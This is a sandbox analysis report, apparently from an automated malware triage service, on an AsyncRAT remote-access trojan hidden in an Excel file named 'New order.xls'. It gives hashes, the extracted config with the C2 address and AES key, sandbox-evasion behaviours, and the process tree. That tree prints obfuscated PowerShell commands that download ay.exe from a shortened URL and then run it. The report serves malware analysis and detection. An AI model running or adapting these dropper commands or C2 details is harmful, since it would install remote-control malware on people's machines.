asyncrat | 076c11df218d9fd86a809bb3e3b4a9c2211caad31e630d731d64592bee49eec4

General

Target

New order.xls
Size

80KB
MD5

bfa6b801f26f67cc2231d4191a2486e5
SHA1

d6c3fe24036c6b402eeb80e065a11280aa236625
SHA256

076c11df218d9fd86a809bb3e3b4a9c2211caad31e630d731d64592bee49eec4
SHA512

b06a89f9606533c9c7c6c0884c76c7e59919e1b66425e7e7f97d11bb2faafea80ed379c056c440269f3c6b132c297ea90172f54f893600747609d67a1202367b

Score

10^/10

asyncrat evasion rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/y6fpv3lj

Extracted

Family

asyncrat

Version

0.5.7B

C2

66.63.162.20:6606

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
RrDsbyhuW4EmI2uyYOZXhcgJIPtjUanF
anti_detection
false
autorun
false
bdos
false
delay
Default
host
66.63.162.20
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6606
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4248	4700	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2320	4700	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1864	4700	powershell.exe	EXCEL.EXE

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4636-38-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/4636-39-0x000000000040C71E-mapping.dmp	asyncrat

Looks for VirtualBox Guest Additions in registry 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

19 4248 powershell.exe
21 4248 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

ay.exe

pid process

2684 ay.exe
Looks for VMWare Tools registry key 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

flow	pid	process
19	4248	powershell.exe
21	4248	powershell.exe

pid	process
2684	ay.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ay.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ay.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ay.exe

Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

4700 EXCEL.EXE

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ay.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	ay.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	ay.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

ay.exe

description pid process target process

PID 2684 set thread context of 4636 2684 ay.exe RegSvcs.exe

description	pid	process	target process
PID 2684 set thread context of 4636	2684	ay.exe	RegSvcs.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4700 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exeay.exe

pid	process
2320	powershell.exe
4248	powershell.exe
1864	powershell.exe
2320	powershell.exe
1864	powershell.exe
4248	powershell.exe
1864	powershell.exe
2320	powershell.exe
4248	powershell.exe
2684	ay.exe
2684	ay.exe
2684	ay.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

4700 EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeay.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	4248	powershell.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	2684	ay.exe
Token: SeDebugPrivilege	4636	RegSvcs.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

4700 EXCEL.EXE
4700 EXCEL.EXE

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE
4700	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

EXCEL.EXEpowershell.exeay.exe

description	pid	process	target process
PID 4700 wrote to memory of 4248	4700	EXCEL.EXE	powershell.exe
PID 4700 wrote to memory of 4248	4700	EXCEL.EXE	powershell.exe
PID 4700 wrote to memory of 1864	4700	EXCEL.EXE	powershell.exe
PID 4700 wrote to memory of 1864	4700	EXCEL.EXE	powershell.exe
PID 4700 wrote to memory of 2320	4700	EXCEL.EXE	powershell.exe
PID 4700 wrote to memory of 2320	4700	EXCEL.EXE	powershell.exe
PID 2320 wrote to memory of 2684	2320	powershell.exe	ay.exe
PID 2320 wrote to memory of 2684	2320	powershell.exe	ay.exe
PID 2320 wrote to memory of 2684	2320	powershell.exe	ay.exe
PID 2684 wrote to memory of 4628	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4628	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4628	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4636	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4636	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4636	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4636	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4636	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4636	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4636	2684	ay.exe	RegSvcs.exe
PID 2684 wrote to memory of 4636	2684	ay.exe	RegSvcs.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New order.xls"
1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y6fpv3lj','ay.exe')
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:temp};.('.'+'/ay.exe')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320

C:\Users\Admin\AppData\Local\Temp\ay.exe
"C:\Users\Admin\AppData\Local\Temp\ay.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:4628

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 stARt`-slE`Ep 20; Move-Item "ay.exe" -Destination "${enV`:temp}"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

2

T1497

Credential Access

Discovery

Query Registry

6

T1012

Virtualization/Sandbox Evasion

2

T1497

System Information Discovery

4

T1082

Peripheral Device Discovery

1

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
7154a7ce3817a476dca78708c23e2799

SHA1
2153675b22d57da46daf336a402e867702f5f650

SHA256
a117742fc3a07fbfc4d7ff923766049d6c2c0510d21f589595f37d40aaaa5307

SHA512
6fda9e6e2f46a56ce611167c08efc1d74295b59aa365c757aaef89b25477c9263ea97468e2c134e90af634c9816b74db80745466da759e938ec83f507421769f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e71aacec59c24399659bcdddf8e20e5b

SHA1
1f8fade188e695105c0308208bf23304d48a63f5

SHA256
0087f4940427198ef2f1a386f3baf80482f0683f6cdee63f949d6f7c93561085

SHA512
5ffd34b3f634e0568196de7e33d2067834ae1d6a4de6abc657f7630de6e31ff821949dc91c4e87d456d4ee3023cdfbf0048fd3fa6122096377820be6e29e693a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ay.exe
MD5
2a7d72ec0e6ad3921e8d4dee4c6873de

SHA1
ef46dd592a91a1837abba07739c5a1150ca48c60

SHA256
6d271e56dca462bf5b1e9b27de466986943e9227ffba986614b38f376bf68c8c

SHA512
2ede9e22aa6c20ee9c65365059d2ca6cbf915c8f94f4ad82bbe15cedef974ef5f43103024ec1a024a665316b5a6b939a731e3e4dbfc7d390fa70d44713ae0cf6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
e73b5156c988e909dcc5823cd69dc8dc

SHA1
a5f6b458ad0bdc6e238913d4ce56384587dd0793

SHA256
48076c4ccc1948c604c9e2a88be8f37e0a99b0f7949bd9cb335bb2a61ecd81b6

SHA512
a3148db8e007fc4c21a119338d38a143ad601c0760cc4ba818a5253303fd1ce9e84a5371760825d8973766a74d0064667578007d50e3901486eda61705d120d1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
36a171ab1d9935c7255ba9d818c28c7d

SHA1
e30f5b084a3ba3142a48bdcbf68aeebc194ff7f5

SHA256
397623ae34681cd73e75ba5670988014fa7f68a3884ab7c28d8a5661ce21e435

SHA512
701a4e8adc53a996c9c8fe27266fdd2287dbfd4f57ada8bf796226801a224e6a421393590f1052e3724364f20d203add2a3169c22f456f6f0bce58c9cf0ed3ad

Download Submit
C:\Users\Admin\Documents\ay.exe
MD5
2a7d72ec0e6ad3921e8d4dee4c6873de

SHA1
ef46dd592a91a1837abba07739c5a1150ca48c60

SHA256
6d271e56dca462bf5b1e9b27de466986943e9227ffba986614b38f376bf68c8c

SHA512
2ede9e22aa6c20ee9c65365059d2ca6cbf915c8f94f4ad82bbe15cedef974ef5f43103024ec1a024a665316b5a6b939a731e3e4dbfc7d390fa70d44713ae0cf6

Download Submit
memory/1864-9-0x00007FF9809C0000-0x00007FF9813AC000-memory.dmp

Filesize
9.9MB

Download
memory/1864-5-0x0000000000000000-mapping.dmp

Download
memory/1864-15-0x0000016D39FB0000-0x0000016D39FB1000-memory.dmp

Filesize
4KB

Download
memory/2320-6-0x0000000000000000-mapping.dmp

Download
memory/2320-12-0x000001BE6FA10000-0x000001BE6FA11000-memory.dmp

Filesize
4KB

Download
memory/2320-10-0x00007FF9809C0000-0x00007FF9813AC000-memory.dmp

Filesize
9.9MB

Download
memory/2684-27-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/2684-29-0x0000000005850000-0x0000000005851000-memory.dmp

Filesize
4KB

Download
memory/2684-21-0x0000000000000000-mapping.dmp

Download
memory/2684-37-0x0000000047290000-0x0000000047291000-memory.dmp

Filesize
4KB

Download
memory/2684-36-0x0000000047180000-0x00000000471B2000-memory.dmp

Filesize
200KB

Download
memory/2684-24-0x0000000073FA0000-0x000000007468E000-memory.dmp

Filesize
6.9MB

Download
memory/2684-25-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/2684-34-0x0000000005AD0000-0x0000000005AD8000-memory.dmp

Filesize
32KB

Download
memory/2684-28-0x0000000005D50000-0x0000000005D51000-memory.dmp

Filesize
4KB

Download
memory/2684-33-0x0000000047040000-0x000000004708F000-memory.dmp

Filesize
316KB

Download
memory/2684-30-0x00000000057C0000-0x00000000057C1000-memory.dmp

Filesize
4KB

Download
memory/2684-31-0x0000000005A20000-0x0000000005A21000-memory.dmp

Filesize
4KB

Download
memory/2684-32-0x0000000026C30000-0x0000000046C18000-memory.dmp

Filesize
511.9MB

Download
memory/4248-4-0x0000000000000000-mapping.dmp

Download
memory/4248-11-0x00007FF9809C0000-0x00007FF9813AC000-memory.dmp

Filesize
9.9MB

Download
memory/4636-38-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4636-39-0x000000000040C71E-mapping.dmp

Download
memory/4636-40-0x0000000073FA0000-0x000000007468E000-memory.dmp

Filesize
6.9MB

Download
memory/4700-2-0x00007FF988D80000-0x00007FF9893B7000-memory.dmp

Filesize
6.2MB

Download
memory/4700-3-0x0000026EB08C0000-0x0000026EB08C1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads